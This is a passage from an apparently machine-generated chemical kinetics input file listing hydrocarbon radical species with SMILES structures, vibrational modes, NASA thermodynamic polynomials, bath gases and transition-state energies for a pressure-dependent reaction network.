thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.21023,0.0555238,-2.63652e-05,-4.35895e-09,6.27756e-12,84020.2,26.8273], Tmin=(100,'K'), Tmax=(923.387,'K')), NASAPolynomial(coeffs=[10.335,0.0309114,-1.06121e-05,1.76031e-09,-1.15182e-13,81699.2,-19.9103], Tmin=(923.387,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(697.704,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + longDistanceInteraction_noncyclic(CdCs-ST) + group(Cds-CdsHH) + radical(Isobutyl) + radical(AllylJ2_triplet) + radical(Isobutyl)"""),
)
species(
label = '[CH]C([CH])=C[CH2](21258)',
structure = SMILES('[CH]C([CH])=C[CH2]'),
E0 = (823.911,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,3010,987.5,1337.5,450,1655,350,440,435,1725,328.03,328.033,328.034,328.035,328.036,328.04],'cm^-1')),
HinderedRotor(inertia=(0.664758,'amu*angstrom^2'), symmetry=1, barrier=(50.762,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.664777,'amu*angstrom^2'), symmetry=1, barrier=(50.7619,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.664772,'amu*angstrom^2'), symmetry=1, barrier=(50.7618,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (65.0932,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.78722,0.0415433,-8.93762e-06,-1.22359e-08,6.20359e-12,99179.3,20.1709], Tmin=(100,'K'), Tmax=(1059.47,'K')), NASAPolynomial(coeffs=[8.69747,0.0295269,-1.18496e-05,2.13401e-09,-1.45711e-13,96925.3,-17.2938], Tmin=(1059.47,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(823.911,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(220.334,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(AllylJ2_triplet) + radical(Allyl_P) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH]C([CH])=C([CH2])C(19692)',
structure = SMILES('[CH]C([CH])=C([CH2])C'),
E0 = (784.856,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,325,375,415,465,420,450,1700,1750,3000,3100,440,815,1455,1000,200,800,1000,1200,1400,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (79.1198,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.948164,0.0613832,-3.83155e-05,1.23014e-08,-1.65031e-12,94510.7,23.945], Tmin=(100,'K'), Tmax=(1662.91,'K')), NASAPolynomial(coeffs=[12.3948,0.0338493,-1.3479e-05,2.34436e-09,-1.53386e-13,90703.8,-37.0999], Tmin=(1662.91,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(784.856,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(291.007,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsCs) + radical(AllylJ2_triplet) + radical(AllylJ2_triplet) + radical(Allyl_P)"""),
)
species(
label = '[CH]C(=[CH])C([CH2])[CH2](19200)',
structure = SMILES('[CH]C(=[CH])C([CH2])[CH2]'),
E0 = (944.8,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,3120,650,792.5,1650,1380,1390,370,380,2900,435,350,440,435,1725,492.573,492.856,493.377],'cm^-1')),
HinderedRotor(inertia=(0.00069575,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.310712,'amu*angstrom^2'), symmetry=1, barrier=(53.542,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.31084,'amu*angstrom^2'), symmetry=1, barrier=(53.541,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.310118,'amu*angstrom^2'), symmetry=1, barrier=(53.5398,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (79.1198,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.16628,0.0586672,-4.15569e-05,1.0902e-08,1.3757e-12,113739,26.6969], Tmin=(100,'K'), Tmax=(889.962,'K')), NASAPolynomial(coeffs=[10.5201,0.0281773,-9.63713e-06,1.57586e-09,-1.01524e-13,111616,-19.9098], Tmin=(889.962,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(944.8,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(291.007,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + longDistanceInteraction_noncyclic(CdCs-ST) + group(Cds-CdsHH) + radical(AllylJ2_triplet) + radical(Isobutyl) + radical(Isobutyl) + radical(Cds_P)"""),
)
species(
label = '[CH]C(=C)C(=C)C(18075)',
structure = SMILES('[CH]C(=C)C(=C)C'),
E0 = (389.424,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,325,375,415,465,420,450,1700,1750,2950,3000,3050,3100,1330,1430,900,1050,1000,1050,1600,1700,180,180,180,180],'cm^-1')),
HinderedRotor(inertia=(2.14161,'amu*angstrom^2'), symmetry=1, barrier=(49.2399,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(2.14261,'amu*angstrom^2'), symmetry=1, barrier=(49.2628,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(2.14146,'amu*angstrom^2'), symmetry=1, barrier=(49.2363,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.986292,0.0569524,-2.36192e-05,-8.84439e-09,7.31756e-12,46953.6,21.1224], Tmin=(100,'K'), Tmax=(1006.49,'K')), NASAPolynomial(coeffs=[12.9227,0.0289714,-1.09157e-05,1.94828e-09,-1.34051e-13,43565.3,-41.437], Tmin=(1006.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(389.424,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(320.107,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-Cds(Cds-Cds)Cs) + group(Cds-Cds(Cds-Cds)Cs) + group(Cds-CdsHH) + group(Cds-CdsHH) + radical(AllylJ2_triplet)"""),
)
species(
label = 'CH2(S)(14)',
structure = SMILES('[CH2]'),
E0 = (419.091,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1369.93,2896.01,2896.03],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.10264,-0.00144068,5.45069e-06,-3.58002e-09,7.56192e-13,50400.6,-0.411765], Tmin=(100,'K'), Tmax=(1442.36,'K')), NASAPolynomial(coeffs=[2.62648,0.00394763,-1.49924e-06,2.54539e-10,-1.62956e-14,50691.8,6.78378], Tmin=(1442.36,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(419.091,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(S)""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = '[CH]C(=[CH])C[CH2](18837)',
structure = SMILES('[CH]C(=[CH])C[CH2]'),
E0 = (767.45,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2750,2850,1437.5,1250,1305,750,350,350,440,435,1725,3000,3100,440,815,1455,1000,498.567,499.809,501.077],'cm^-1')),
HinderedRotor(inertia=(0.291866,'amu*angstrom^2'), symmetry=1, barrier=(52.092,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.293908,'amu*angstrom^2'), symmetry=1, barrier=(52.1161,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.29664,'amu*angstrom^2'), symmetry=1, barrier=(52.0336,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (66.1011,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3074.1,'J/mol'), sigma=(5.55822,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=480.17 K, Pc=40.62 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.65878,0.0455874,-2.94386e-05,9.8193e-09,-1.35238e-12,92392,21.8548], Tmin=(100,'K'), Tmax=(1655.31,'K')), NASAPolynomial(coeffs=[11.0697,0.0228462,-8.83111e-06,1.51975e-09,-9.89077e-14,89276.4,-28.2906], Tmin=(1655.31,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(767.45,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsHH) + radical(AllylJ2_triplet) + radical(Cds_P) + radical(RCCJ)"""),
)
species(
label = '[CH]C([CH])=CCC(21273)',
structure = SMILES('[CH]C([CH])=CCC'),
E0 = (649.766,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.03631,0.056981,-2.30081e-05,-1.43386e-09,2.37915e-12,78262.2,25.5066], Tmin=(100,'K'), Tmax=(1214.05,'K')), NASAPolynomial(coeffs=[10.1548,0.0390469,-1.5811e-05,2.82965e-09,-1.90572e-13,75155.8,-23.9289], Tmin=(1214.05,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(649.766,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(AllylJ2_triplet) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH]C(=[CH])C[CH]C(18912)',
structure = SMILES('[CH]C(=[CH])C[CH]C'),
E0 = (732.87,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2850,1437.5,1250,1305,750,350,350,440,435,1725,3120,650,792.5,1650,2750,2800,2850,1350,1500,750,1050,1375,1000,514.385,514.912,516.225,516.862],'cm^-1')),
HinderedRotor(inertia=(0.000621478,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.282893,'amu*angstrom^2'), symmetry=1, barrier=(53.891,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.283783,'amu*angstrom^2'), symmetry=1, barrier=(53.7954,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.298436,'amu*angstrom^2'), symmetry=1, barrier=(53.944,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.65953,0.0543528,-3.41486e-05,1.21485e-08,-1.99454e-12,88225.5,25.0313], Tmin=(100,'K'), Tmax=(1266.28,'K')), NASAPolynomial(coeffs=[6.23748,0.0398916,-1.70181e-05,3.12966e-09,-2.13952e-13,87066.1,1.86455], Tmin=(1266.28,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(732.87,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsCsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsHH) + radical(Cds_P) + radical(AllylJ2_triplet) + radical(RCCJC)"""),
)
species(
label = '[CH]C1=CCC1C(21274)',
structure = SMILES('[CH]C1=CCC1C'),
E0 = (444.345,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.88991,0.0288127,5.7306e-05,-9.17238e-08,3.62878e-11,53534.2,20.0457], Tmin=(100,'K'), Tmax=(965.058,'K')), NASAPolynomial(coeffs=[12.5588,0.0283833,-1.00919e-05,1.85478e-09,-1.34496e-13,49435.7,-41.6113], Tmin=(965.058,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(444.345,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(324.264,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + ring(Cyclobutene) + radical(AllylJ2_triplet)"""),
)
species(
label = 'CH2(T)(28)',
structure = SMILES('[CH2]'),
E0 = (381.37,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1066.91,2790.99,3622.37],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.01192,-0.000154979,3.26298e-06,-2.40422e-09,5.69497e-13,45867.7,0.5332], Tmin=(100,'K'), Tmax=(1104.58,'K')), NASAPolynomial(coeffs=[3.14983,0.00296674,-9.76056e-07,1.54115e-10,-9.50338e-15,46058.1,4.77808], Tmin=(1104.58,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(381.37,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(T)""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = '[CH]C([CH])=CC(21257)',
structure = SMILES('[CH]C([CH])=CC'),
E0 = (672.412,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3010,987.5,1337.5,450,1655,350,440,435,1725,302.964,302.964,302.966,302.968,302.978,302.992],'cm^-1')),
HinderedRotor(inertia=(0.783156,'amu*angstrom^2'), symmetry=1, barrier=(51.0103,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.783094,'amu*angstrom^2'), symmetry=1, barrier=(51.0102,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.783135,'amu*angstrom^2'), symmetry=1, barrier=(51.0104,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (66.1011,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.70252,0.0448033,-1.90919e-05,1.71805e-09,5.4842e-13,80959.9,20.2105], Tmin=(100,'K'), Tmax=(1432.87,'K')), NASAPolynomial(coeffs=[8.99387,0.0315806,-1.27157e-05,2.22513e-09,-1.46128e-13,78138.2,-20.1434], Tmin=(1432.87,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(672.412,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(AllylJ2_triplet) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH]C(=[CH])C([CH])C(21275)',
structure = SMILES('[CH]C(=[CH])C([CH])C'),
E0 = (982.851,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2750,2800,2850,1350,1500,750,1050,1375,1000,1380,1390,370,380,2900,435,350,440,435,1725,200,800,1000,1200,1400,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (79.1198,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.794676,0.0615631,-4.67001e-05,1.85473e-08,-2.99066e-12,118332,26.1726], Tmin=(100,'K'), Tmax=(1467.14,'K')), NASAPolynomial(coeffs=[14.1607,0.025122,-9.44272e-06,1.61746e-09,-1.05816e-13,114411,-43.434], Tmin=(1467.14,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(982.851,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(291.007,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + longDistanceInteraction_noncyclic(CdCs-ST) + group(Cds-CdsHH) + radical(CCJ2_triplet) + radical(AllylJ2_triplet) + radical(Cds_P)"""),
)
species(
label = '[C]C(=[CH])C([CH2])C(21276)',
structure = SMILES('[C]C(=[CH])C([CH2])C'),
E0 = (1038.51,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,1380,1390,370,380,2900,435,3120,650,792.5,1650,350,440,435,1725,395.001],'cm^-1')),
HinderedRotor(inertia=(0.0823483,'amu*angstrom^2'), symmetry=1, barrier=(9.04704,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0816193,'amu*angstrom^2'), symmetry=1, barrier=(9.04182,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.248242,'amu*angstrom^2'), symmetry=1, barrier=(27.3137,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (79.1198,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.870208,0.061859,-5.90831e-05,2.98425e-08,-5.95954e-12,125023,24.7062], Tmin=(100,'K'), Tmax=(1223.59,'K')), NASAPolynomial(coeffs=[14.0868,0.0186511,-6.11215e-06,9.80278e-10,-6.22518e-14,121788,-41.7227], Tmin=(1223.59,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(1038.51,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(295.164,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + longDistanceInteraction_noncyclic(CdCs-ST) + group(Cds-CdsHH) + radical(Isobutyl) + radical(Cds_P) + radical(CJ3)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.64289,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.53101,-0.000123661,-5.02999e-07,2.43531e-09,-1.40881e-12,-1046.98,2.96747], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.95258,0.0013969,-4.92632e-07,7.8601e-11,-4.60755e-15,-923.949,5.87189], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-8.64289,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'He',
structure = SMILES('[He]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (4.0026,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(84.8076,'J/mol'), sigma=(2.576,'angstroms'), dipoleMoment=(0,'De'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""NOx2018"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,0.928724], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,0.928724], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""He""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'Ar',
structure = SMILES('[Ar]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (39.348,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1134.93,'J/mol'), sigma=(3.33,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,4.37967], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,4.37967], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ar""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (739.718,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (859.143,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (922.947,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (834.005,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (887.531,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (793.412,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (836.699,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (931.847,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (784.027,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (959.293,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (1140.79,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (996.661,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (1156.6,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (803.118,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (1186.54,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS16',
E0 = (934.483,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS17',
E0 = (899.653,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS18',
E0 = (748.002,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS19',
E0 = (1088.1,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS20',
E0 = (1194.66,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS21',
E0 = (1250.32,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
